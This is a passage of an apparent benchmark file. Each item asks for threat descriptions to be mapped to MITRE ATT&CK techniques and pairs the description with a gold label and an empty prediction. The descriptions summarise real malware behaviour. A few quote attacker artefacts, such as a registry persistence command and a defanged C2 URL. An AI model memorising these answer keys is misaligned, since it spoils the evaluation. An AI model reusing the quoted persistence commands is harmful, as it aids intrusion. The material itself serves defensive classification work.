retrieved value is checked against several hardcoded paths in which the low DWORD is set to 0x0429\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: ComRAT can check the victim's default browser to determine which process to inject its communications module into.\n\t - T1518: Software Discovery\n", + "input": "Bazar can fingerprint architecture, computer name, and OS version on the compromised host. Bazar can also check if the Russian language is installed on the infected machine and terminate if it is found.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n- Text: APT37 uses HTTPS to conceal C2 communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: These files are then transmitted to a threat actor, often over commonly open ports 80 and 443 (HTTP and HTTPS)\n\t - T1571: Non-Standard Port\n\t - T1043: Commonly Used Port\n", + "input": "Bankshot uses HTTP for command and control communication.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FrameworkPOS can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.\n\t - T1057: Process Discovery\n- Text: CosmicDuke exfiltrates collected files automatically over FTP to remote servers.\n\t - T1020: Automated Exfiltration\n- Text: APT41 used the Steam community page as a fallback mechanism for C2.\n\t - T1008: Fallback Channels\n", + "input": "Molerats actors obtained a list of active processes on the victim and sent them to C2 servers.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Remexi achieves persistence using Userinit by adding the Registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\".\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n- Text: adds Registry Run keys to achieve persistence.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Blue Mockingbird has used Windows Registry modifications to specify a DLL payload.\n\t - T1112: Modify Registry\n", + "input": "KeyBoy issues the command \"reg add \u201cHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u201d\" to achieve persistence.", + "gold": "- T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BRONZE BUTLER has obtained and used open-source tools such as Mimikatz, gsecdump, and Windows Credential Editor.\n\t - T1588.002: Obtain Capabilities - Tool\n- Text: PoshC2 contains an implementation of Mimikatz to gather credentials from memory.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services\n\t - T1569.002: System Services - Service Execution\n", + "input": "Chimera has obtained and used tools such as BloodHound, Cobalt Strike, Mimikatz, and PsExec.", + "gold": "- T1588.002: Obtain Capabilities - Tool", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Zox has the ability to leverage local and remote exploits to escalate privileges.\n\t - T1068: Exploitation for Privilege Escalation\n- Text: Saint Bot has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: Cobalt Strike can spawn processes with alternate PPIDs.\n\t - T1134.004: Access Token Manipulation - Parent PID Spoofing\n", + "input": "Cobalt Group has used exploits to increase their levels of rights and privileges.", + "gold": "- T1068: Exploitation for Privilege Escalation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POSHSPY WMI Component The WMI component of the POSHSPY backdoor leverages a Filter to execute the PowerShell component of the backdoor on a regular basis\n\t - T1047: Windows Management Instrumentation\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Fox Kitten has used RDP to log in and move laterally in the target environment.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: Cobalt Strike can use Window admin shares (C$ and ADMIN$) for lateral movement.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n", + "input": "The Deep Panda group is known to utilize WMI for lateral movement.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stealth Falcon malware creates a scheduled task entitled \u201cIE Web Cache\u201d to execute a malicious file hourly.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: used msxsl.exe to bypass AppLocker and to invoke Jscript code from an XSL file.\n\t - T1220: XSL Script Processing\n- Text: During Frankenstein, the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Lazarus Group has used \"schtasks\" for persistence including through the periodic execution of a remote XSL script or a dropped VBS payload.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: build_downer has the ability to determine the local time to ensure malware installation only happens during the hours that the infected system is active.\n\t - T1124: System Time Discovery\n- Text: Patchwork collected and exfiltrated files from the infected system.\n\t - T1005: Data from Local System\n- Text: Backdoor.Pirpi also collects information about the target\u2019s local network, including the domain controller and workstations\n\t - T1016: System Network Configuration Discovery\n", + "input": "BLUELIGHT can collect the local time on a compromised host.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gazer can execute a task to download a file.\n\t - T1105: Ingress Tool Transfer\n- Text: Operation Wocao has used a VBScript to conduct reconnaissance on targeted systems.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: uses to inject shellcode into PowerShell.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Amadey can download and execute files to further infect a host machine with additional malware.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.\n\t - T1046: Network Service Discovery\n- Text: APT38 has enumerated network shares on a compromised host.\n\t - T1135: Network Share Discovery\n- Text: We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command\n\t - T1049: System Network Connections Discovery\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", + "input": "Tropic Trooper used \"pr\" and an openly available tool to scan for open ports on target systems.", + "gold": "- T1046: Network Service Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: BADNEWS is sometimes signed with an invalid Authenticode certificate in an apparent effort to make it look more legitimate.\n\t - T1036.001: Masquerading - Invalid Code Signature\n- Text: Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not.\n\t - T1596.003: Search Open Technical Databases - Digital Certificates\n", + "input": "BackConfig has been signed with self signed digital certificates mimicking a legitimate software company.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: macOS.OSAMiner has embedded Stripped Payloads within another run-only Stripped Payloads.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n- Text: Ecipekac has the ability to decrypt fileless loader modules.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: has encoded strings in its malware with base64 as well as with a simple, single-byte XOR obfuscation using key 0x40.\n\t - T1027: Obfuscated Files or Information\n", + "input": "The SMOKEDHAM source code is embedded in the dropper as an encrypted string.", + "gold": "- T1027: Obfuscated Files or Information\n- T1027.009: Obfuscated Files or Information - Embedded Payloads", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the first campaign, the email (Figure 1) purported to be from FinCERT [8] with the subject \u201c\u041f\u0430\u043c\u044f\u0442\u043a\u0430 \u043f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u201d (Information Security Notice) and contained a Microsoft Word attachment named \u201c\u0441\u0432\u043e\u0434\u043a\u04301705.doc\u201d (report1705) (Figure 3). - Another email (Figure 2) purported to be from Security Support for PCI-DSS [3] at a major credit card company with the subject line \u201c\u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c\u201d (security) and a Microsoft Word attachment (Figure 4) \u201c\u0422\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.doc\u201d (Safety requirements\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: We have discovered that malware dubbed WinDealer, spread by Chinese-speaking APT actor LuoYu, has an ability to perform intrusions through a man-on-the-side attack\n\t - T1204.001: User Execution - Malicious Link\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1566.002: Phishing - Spearphishing Link\n\t - T1120: Peripheral Device Discovery\n- Text: Silent Librarian has used links in e-mails to direct victims to credential harvesting websites designed to appear like the targeted organization's login page.\n\t - T1598.003: Phishing for Information - Spearphishing Link\n", + "input": "The primary delivered mechaism for Agent Tesla is through email phishing messages.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DarkVishnya scanned the network for public shared folders.\n\t - T1135: Network Share Discovery\n- Text: Blue Mockingbird has used Windows Explorer to manually copy malicious files to remote hosts over SMB.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: steals user files from network shared drives with file extensions and keywords that match a predefined list.\n\t - T1039: Data from Network Shared Drive\n", + "input": "Clop can enumerate network shares.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Small Sieve can obtain the id of a logged in user.\n\t - T1033: System Owner/User Discovery\n- Text: APT28 has used tools to perform keylogging.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Poseidon Group searches for administrator accounts on both the local victim machine and the network.\n\t - T1087.001: Account Discovery - Local Account\n\t - T1087.002: Account Discovery - Domain Account\n", + "input": "yty collects the victim\u2019s username.", + "gold": "- T1033: System Owner/User Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PowerLess can stage stolen browser data in `C:\\\\Windows\\\\Temp\\\\cup.tmp` and keylogger data in `C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: RemoteUtilities can enumerate files and directories on a target machine.\n\t - T1083: File and Directory Discovery\n- Text: Mis-Type may create a file containing the results of the command \"cmd.exe /c net user {Username}\".\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "ECCENTRICBANDWAGON has stored keystrokes and screenshots within the \"%temp%\\GoogleChrome\", \"%temp%\\Downloads\", and \"%temp%\\TrendMicroUpdate\" directories.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POWERSTATS can retrieve usernames from compromised hosts.\n\t - T1087.001: Account Discovery - Local Account\n- Text: AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect\n\t - T1082: System Information Discovery\n\t - T1049: System Network Connections Discovery\n- Text: Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind and \"nltest/dclist\" to enumerate domain computers, including the domain controller.\n\t - T1018: Remote System Discovery\n", + "input": "SHOTPUT has a command to retrieve information about connected users.", + "gold": "- T1087.001: Account Discovery - Local Account", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.\n\t - T1105: Ingress Tool Transfer\n- Text: MuddyWater has used a PowerShell backdoor to check for Skype connectivity on the target machine.\n\t - T1518: Software Discovery\n- Text: The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance\n\t - T1036: Masquerading\n\t - T1102: Web Service\n", + "input": "down_new has the ability to download files to the compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taidoor can use TCP for C2 communications.\n\t - T1095: Non-Application Layer Protocol\n- Text: The QakBot proxy module can encapsulate SOCKS5 protocol within its own proxy protocol.\n\t - T1572: Protocol Tunneling\n- Text: Ebury can deactivate PAM modules to tamper with the sshd configuration.\n\t - T1556.003: Modify Authentication Process - Pluggable Authentication Modules\n", + "input": "Umbreon provides access to the system via SSH or any other protocol that uses PAM to authenticate.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Apart for its backdoor routines, this malware can steal information through keylogging, audio recording, and screen capture\n\t - T1113: Screen Capture\n\t - T1123: Audio Capture\n- Text: Dragonfly 2.0 modified the Registry to hide create user accounts.\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: MacMa can manage remote screen sessions.\n\t - T1021: Remote Services\n", + "input": "KeyBoy has a command to perform screen grabbing.", + "gold": "- T1113: Screen Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Bazar Loader malware was using a code signing certificate signed by Digicert under the organization NOSOV SP Z O O\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: Stolen digital certificate re-use\n\t - T1588.004: Obtain Capabilities - Digital Certificates\n", + "input": "BlackTech has used stolen code-signing certificates for its malicious payloads.", + "gold": "- T1588.003: Obtain Capabilities - Code Signing Certificates", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SUGARDUMP using SMTP for C2 communication \u2013 dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp://128.199.6[.]246/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. \n\t - T1041: Exfiltration Over C2 Channel\n- Text: Cherry Picker exfiltrates files over FTP.\n\t - T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol\n- Text: The configuration data used by the backdoor has the following structure: #pragma pack(push, 1) struct st_cncconfig { _WORD id; _BYTE byte2; _BYTE byte3; _QWORD pCnCBeg; _QWORD pCnCEnd; _QWORD pLastElement; }; #pragma pack(pop) To be able to enter the data into the database, Linux.BackDoor.Fysbis.1 converts the configuration data into the following structure: #pragma pack(push, 1) struct st_crypted_config_data { _WORD id; _BYTE byte2; _BYTE byte3; char* pCnC; }; #pragma pack(pop) Before the configuration data is encrypted with the RC4 algorithm, 11 signature bytes are added to the end of the data (11 bytes are stored in the backdoor's body)\n\t - T1005: Data from Local System\n\t - T1140: Deobfuscate/Decode Files or Information\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n\t - T1486: Data Encrypted for Impact\n", + "input": "Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.\n\t - T1056.001: Input Capture - Keylogging\n- Text: uses a custom crypter leveraging Microsoft\u2019s CryptoAPI to encrypt C2 traffic.\n\t - T1573: Encrypted Channel\n- Text: ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.\n\t - T1010: Application Window Discovery\n", + "input": "gh0st RAT has a keylogger.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process.\n\t - T1055: Process Injection\n- Text: The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process\n\t - T1055: Process Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n- Text: 4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid \u2013 using the AES and RSA algorithms\n\t - T1573.002: Encrypted Channel - Asymmetric Cryptography\n\t - T1486: Data Encrypted for Impact\n", + "input": "Ryuk has injected itself into remote processes to encrypt files using a combination of \"VirtualAlloc\", \"WriteProcessMemory\", and \"CreateRemoteThread\".", + "gold": "- T1055: Process Injection", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Sibot has been executed via MSHTA application.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Molerats used various implants, including those built with JS, on target machines.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n- Text: On June 12, QakBot continued its evolution. The delivery method of a .ZIP file to malicious .VBS was the same, but this time QakBot also dropped a Zloader payload on its victim. Beginning around 14:24 UTC, Falcon Complete observed QakBot threat actors using a new .VBS payload\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "Metamorfo has used mshta.exe to execute a HTA payload.", + "gold": "- T1218.005: System Binary Proxy Execution - Mshta", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The macro then creates a scheduled task named SecurityAssist that runs after waiting one minute. OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0. The Trojan extracts and loads this embedded assembly by concatenating the contents of two resources named S1 and S2 and decompresses the resulting data using the GZipSteam class. The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0. By using the InternetExplorer application object, all C2 related requests will look as if they came from the legitimate browser and therefore will not contain any anomalous fields within the request, such as custom User-Agents. As seen in the above request, the Trojan will generate a URL for its beacon with the following structure: http://<c2 domain>/chk. The C2 server will respond to the Trojan\u2019s request by echoing the value <hex(Environment.UserName/Environment.MachineName)> if it wishes to provide additional commands. If the C2 server does not respond with the appropriate echoed data, the Trojan will create a file named srvCheckresponded.tmp in the SpecialFolder.CommonApplicationData folder and write nothing to it before exiting\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: BabyShark has used mshta.exe to download and execute applications from a remote server.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Valak can execute JavaScript containing configuration data for establishing persistence.\n\t - T1059.007: Command and Scripting Interpreter - JavaScript\n", + "input": "Xbash can execute malicious VBScript payloads on the victim\u2019s machine.", + "gold": "- T1059.005: Command and Scripting 